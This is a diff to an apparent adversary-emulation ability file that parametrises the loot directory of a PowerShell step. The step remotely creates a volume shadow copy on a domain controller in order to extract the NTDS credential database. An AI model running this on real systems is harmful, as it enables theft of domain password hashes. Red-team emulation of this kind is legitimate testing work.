--- a/plugins/adversary_emulation/data/abilities/credential-access/0f2i3d4e-h6g7-4i8j-de4f-exfiltrate-ntds.yml
+++ b/plugins/adversary_emulation/data/abilities/credential-access/0f2i3d4e-h6g7-4i8j-de4f-exfiltrate-ntds.yml
@@ -14,7 +14,7 @@
       psh:
         command: |
           $dc = "#{domain.controller.hostname}"
-          $localLootDir = "C:\Users\Public\Loot"
+          $localLootDir = "#{env.dir.loot}"
           New-Item -Path $localLootDir -ItemType Directory -ErrorAction SilentlyContinue
           $vssOutput = Invoke-Command -ComputerName $dc -ScriptBlock { cmd /c 'vssadmin create shadow /for=C:' } | Out-String
           $vssOutput -match "(\\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+)"
